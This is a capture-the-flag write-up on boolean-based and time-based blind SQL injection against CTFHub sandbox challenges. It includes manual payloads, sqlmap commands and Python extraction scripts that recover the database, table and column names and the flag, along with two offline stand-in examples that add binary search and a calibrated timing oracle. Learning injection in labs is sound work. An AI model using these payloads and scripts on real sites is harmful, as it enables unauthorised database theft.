CTFHub Web SQL Injection Practice (2)


Boolean-based blind injection

length(): returns the length of a string
substr(): extracts part of a string; three arguments: the string to cut, the 1-based position to start at, and how many characters to take
ascii(): the ASCII code of (the first character of) its argument

Entering 1 and 1=1 returns query_success, meaning the query succeeded.

Entering 1 and 1=2 returns query_error: the page shows the error string whenever the query returns no rows or the statement itself fails. These two responses are the oracle; every request that follows asks one yes/no question and reads the answer from which string comes back.

Manual injection

1. Determine the length of the database name

?id=1 and length(database())>5	#query_error
?id=1 and length(database())=4   #query_success

So the database name is 4 characters long.

2. Now the database name itself
Manual payloads, with Burp Intruder brute-forcing the ASCII value of each position.

Results:

?id=1 and ascii(substr(database(),1,1))=115

?id=1 and ascii(substr(database(),2,1))=113

?id=1 and ascii(substr(database(),3,1))=108

?id=1 and ascii(substr(database(),4,1))=105

The database name is sqli.

3. Count the tables in the database

?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=2

The database contains two tables.

4. Determine the table names

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119

 ?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115

The first table is news.

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97

?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103

The second table is flag.

5. Determine the column name in the flag table

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),2,1))=108

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),3,1))=97

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),4,1))=103

The column is named flag. These queries filter on table_name only; if another database on the same server also had a table called flag, the subquery would return several rows and error out, so adding and table_schema=database() to the where clause is the safer form.

sqlmap injection

Dump the database names

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 --dbs

This gives the database name sqli.
Next, the tables:

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables 

This lists the two tables, news and flag.

Columns

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

The flag table has a single column, flag.
Dump the value

python2 sqlmap.py -u http://challenge-6ba08b6de5cbeb61.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

This gives the flag.

The same four commands work against the time-based challenge; add --technique=T to restrict sqlmap to time-based tests (and --time-sec=3 if you want the same delay as the manual payloads), and --batch to accept the default answers.

Python script injection

Database name

import requests
import string

# candidate characters for each position; the manual step already showed the name is 4 long
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
length = 4
name = ''
for j in range(1, length + 1):
    for i in dic:
        # true branch returns 1 (id=1 exists -> query_success); the false branch is a
        # subquery that returns many rows, so MySQL raises "Subquery returns more than
        # 1 row" -> query_error
        payload = 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (j, i)
        # send the payload as a parameter so #, &, % and + in dic are URL-encoded
        # instead of being eaten by the query-string parser
        r = requests.get(url, params={'id': payload})
        if 'query_success' in r.text:
            name = name + i
            print(name)
            break
print('database_name:', name)

This yields the database name sqli:

s
sq
sql
sqli
database_name: sqli

Tables

import requests
import string

dic = string.digits + string.ascii_letters
url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
tables = []                      # do not shadow the built-in list
for k in range(0, 4):            # limit k,1 walks the tables one at a time
    name = ''
    for j in range(1, 9):        # up to 8 characters per table name
        for i in dic:
            # same error-on-false trick: a multi-row subquery in the else branch
            # turns a wrong guess into query_error
            payload = ('if(substr((select table_name from information_schema.tables '
                       'where table_schema=database() limit %d,1),%d,1)="%s",1,'
                       '(select table_name from information_schema.tables))' % (k, j, i))
            r = requests.get(url, params={'id': payload})
            if 'query_success' in r.text:
                name = name + i
                break
    tables.append(name)
print('table_name:', tables)

Two tables, news and flag:

table_name: ['news', 'flag', '', '']

Columns

import requests
import string

url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
dic = string.digits + string.ascii_letters

columns = []
for k in range(0, 3):
    name = ''
    for j in range(1, 9):
        for i in dic:
            # table_schema=database() keeps a same-named table in another database
            # from turning the subquery into a multi-row (error) result
            payload = ('if(substr((select column_name from information_schema.columns '
                       'where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,'
                       '(select table_name from information_schema.tables))' % (k, j, i))
            r = requests.get(url, params={'id': payload})
            if 'query_success' in r.text:
                name = name + i
                break
    columns.append(name)
print('column_name:', columns)

The column name is flag:

column_name: ['flag', '', '']

Value

import requests

url = 'http://challenge-515a9cc2ebf89df3.sandbox.ctfhub.com:10800/'
name = ''
for j in range(1, 50):
    for i in range(32, 127):     # whole printable ASCII range, so -, ~ and } are not missed
        payload = ('if(ascii(substr((select flag from flag),%d,1))=%d,1,'
                   '(select table_name from information_schema.tables))' % (j, i))
        r = requests.get(url, params={'id': payload})
        if 'query_success' in r.text:
            name = name + chr(i)
            print(name)
            break
    else:
        break                    # no character matched: we are past the end of the flag
print('flag:', name)

The flag:

ctfhub{8ce1bf6d1763687b88a521eb}
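The scripts above try every candidate character in turn, which costs up to one request per character in dic for every position. As an added example that is not part of the original post, the script below performs the same length-then-characters extraction with a binary search over the ASCII value (about seven requests per character) and runs offline against a constructed SQLite stand-in of the vulnerable page. Everything in the stand-in is made up: the news and flag tables, the flag value, and oracle(), which concatenates the id into the query and reports only whether rows came back. SQLite's unicode() plays the role of MySQL's ascii() and sqlite_master replaces information_schema.tables; the stand-in cannot model sleep(). Against the live challenge, oracle() becomes the requests.get call from the scripts above and unicode() goes back to ascii().

```python
import sqlite3

# Constructed stand-in for the challenge backend (not the real CTFHub target).
# The app runs "select ... where id=" + user input and reports only whether rows
# came back; the flag value here is made up.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE news(id INTEGER, title TEXT);
    INSERT INTO news VALUES (1, 'hello');
    CREATE TABLE flag(flag TEXT);
    INSERT INTO flag VALUES ('ctfhub{example_only}');
""")
QUERIES = 0   # number of requests the extraction has needed so far


def query_count():
    return QUERIES


def oracle(user_input):
    """True means the page would print query_success, False query_error.
    A statement that fails to parse also counts as False, exactly as the page does."""
    global QUERIES
    QUERIES += 1
    try:
        rows = _db.execute("select title from news where id=" + user_input).fetchall()
    except sqlite3.Error:
        return False
    return len(rows) > 0


def extract_length(expr, max_len=64):
    """Binary search for the length of the string `expr` evaluates to.
    Invariant: the true length lies in [lo, hi]; a result of max_len means 'too long'."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("1 and length((%s))>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_char(expr, pos):
    """Binary search for the code point of character `pos` (1-based) over printable ASCII.
    SQLite's unicode() stands in for MySQL's ascii(); substr() is the same in both."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("1 and unicode(substr((%s),%d,1))>%d" % (expr, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(expr):
    """Length first, then every character: the same order as the manual steps."""
    n = extract_length(expr)
    return "".join(extract_char(expr, i) for i in range(1, n + 1))


if __name__ == "__main__":
    # sqlite_master is SQLite's information_schema.tables; "limit 1 offset 1" is MySQL's "limit 1,1"
    print(extract_string("select name from sqlite_master where type='table' limit 1 offset 1"))
    print(extract_string("select flag from flag"))
    print(query_count(), "requests")
```

Each comparison halves the remaining range, so a 20-character value costs about 150 requests instead of up to 95 per character; the same loop works unchanged for a time-based oracle once oracle() measures delay instead of looking for a string.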

Time-based blind injection

Entering a plain 1, the page gives nothing to go on: no success or error string appears. With no difference in the response body, the only side channel left is response time, so each condition is wrapped in if(cond, sleep(3), 1) and a true answer shows up as a delay of about three seconds.

Manual injection

1. Use the delay to find the length of the database name

?id=1 and if(length(database())=4,sleep(3),1)

The response is delayed by about 3 seconds, so the database name is 4 characters long.

2. Find the database name

?id=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)	

?id=1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	

?id=1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)	

?id=1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	

Decoding the ASCII values gives the database name sqli.

3. Count the tables

?id=1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)

So the database has two tables.

4. Find the table names

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=119,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115,sleep(3),1)

So the first table is news.

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=108,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=97,sleep(3),1)

?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=103,sleep(3),1)

So the second table is flag.

5. Count the columns of the flag table

?id=1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)

One column.

6. Find the column name

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),2,1))=108,sleep(3),1)

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),3,1))=97,sleep(3),1)

?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),4,1))=103,sleep(3),1)

So the column is named flag.

Script injection

Database name

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'

name = ''
for i in range(1, 5):                    # length 4 was established manually above
    for j in string.ascii_letters:
        payload = 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
        time_start = time.time()
        r = requests.get(url, params={'id': payload})
        time_end = time.time()
        # sleep(3) fires only on a correct guess; 2 s leaves margin for network delay
        if time_end - time_start > 2:
            name += j
            break
    print(name)
print('database_name:', name)

Output:

s
sq
sql
sqli
database_name: sqli

Tables

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'

tables = []                              # do not shadow the built-in list
for i in range(0, 2):                    # two tables, counted manually above
    name = ''
    for j in range(1, 9):
        for k in string.ascii_letters:
            payload = ('if(substr((select table_name from information_schema.tables '
                       'where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k))
            time_start = time.time()
            r = requests.get(url, params={'id': payload})
            time_end = time.time()
            if time_end - time_start > 2:
                name += k
                break
    tables.append(name)
print('table_name:', tables)

Output:

table_name: ['news', 'flag']

Columns

import requests
import string
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'

columns = []
for i in range(0, 1):                    # one column, counted manually above
    name = ''
    for j in range(1, 9):
        for k in string.ascii_letters:
            payload = ('if(substr((select column_name from information_schema.columns '
                       'where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k))
            time_start = time.time()
            r = requests.get(url, params={'id': payload})
            time_end = time.time()
            if time_end - time_start > 2:
                name += k
                break
    columns.append(name)
print('column_name:', columns)

Output:

column_name: ['flag']

Value

import requests
import time

url = 'http://challenge-ada0507efb92b9a6.sandbox.ctfhub.com:10800/'

name = ''
for i in range(1, 50):
    for j in range(32, 127):             # whole printable ASCII range
        payload = 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
        # one timed request per guess; the original sent every request twice,
        # which doubled an already slow run
        time_start = time.time()
        r = requests.get(url, params={'id': payload})
        time_end = time.time()
        if time_end - time_start > 2:
            name += chr(j)
            print(name)
            break
    else:
        break                            # nothing matched: end of the flag
print('data:', name)

This takes a long time to run, since every position needs one request per candidate character and each correct guess costs a 3-second sleep, but the flag eventually comes out.
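The time-based scripts above use a fixed 2-second threshold and measure each request once. As an added example that is not part of the original post, the script below adds the two checks a practitioner puts into a timing oracle: calibrate the baseline round trip with a condition that is always false, and require the delay to repeat before accepting a character, so a single slow response caused by jitter cannot corrupt the result. It runs offline against a constructed stand-in, fake_target(), which parses the page's own if(substr(database(),P,1)="C",sleep(S),1) payload shape and sleeps when the guess is right; the secret name, the jitter and the 0.2-second delay are all made up. Against the live target, fake_target() becomes the requests.get call and SLEEP_SECONDS goes back to 3.

```python
import random
import re
import string
import time

# Constructed stand-in for the time-based challenge (not the real target).
SECRET_DB_NAME = "sqli"      # what database() returns on the stand-in
SLEEP_SECONDS = 0.2          # simulated sleep(); the page uses 3 s against the live site
_PAYLOAD = re.compile(r'substr\(database\(\),(\d+),1\)="([^"]*)"')


def fake_target(payload):
    """Stands in for requests.get(url, params={'id': payload}). The only signal is
    elapsed time: random network jitter always, plus SLEEP_SECONDS when the
    injected condition is true. Anything it cannot parse is treated as false."""
    time.sleep(random.uniform(0.0, 0.03))          # constructed jitter
    m = _PAYLOAD.search(payload)
    if m:
        pos, guess = int(m.group(1)), m.group(2)
        if SECRET_DB_NAME[pos - 1:pos] == guess:
            time.sleep(SLEEP_SECONDS)


def elapsed(payload):
    t0 = time.perf_counter()
    fake_target(payload)
    return time.perf_counter() - t0


def calibrate(samples=5):
    """Slowest of several always-false requests: the baseline the threshold sits on.
    substr(database(),1,1)="" is false on the real target too (the name is not empty)."""
    probe = 'if(substr(database(),1,1)="",sleep(%s),1)' % SLEEP_SECONDS
    return max(elapsed(probe) for _ in range(samples))


def timed_oracle(payload, baseline, confirm=2):
    """Accept a delay only if it clears the threshold `confirm` times in a row.
    A false condition costs one request; jitter must fool us twice to yield a
    false positive."""
    threshold = baseline + SLEEP_SECONDS / 2
    return all(elapsed(payload) > threshold for _ in range(confirm))


def extract_db_name(max_len=16, charset=string.ascii_lowercase + string.digits + "_"):
    """Linear scan like the page's script, but with the calibrated, confirmed oracle.
    Stops at the first position where no character matches (end of the name)."""
    baseline = calibrate()
    name = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            payload = 'if(substr(database(),%d,1)="%s",sleep(%s),1)' % (pos, c, SLEEP_SECONDS)
            if timed_oracle(payload, baseline):
                name += c
                break
        else:
            break
    return name


if __name__ == "__main__":
    print("database_name:", extract_db_name())
```

The threshold sits halfway between the measured baseline and the injected sleep rather than at a hard-coded 2 seconds, so the same code works whether the target answers in 20 ms or 800 ms; raising confirm costs one extra request per true answer and nothing for false ones.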

Author: Atkxor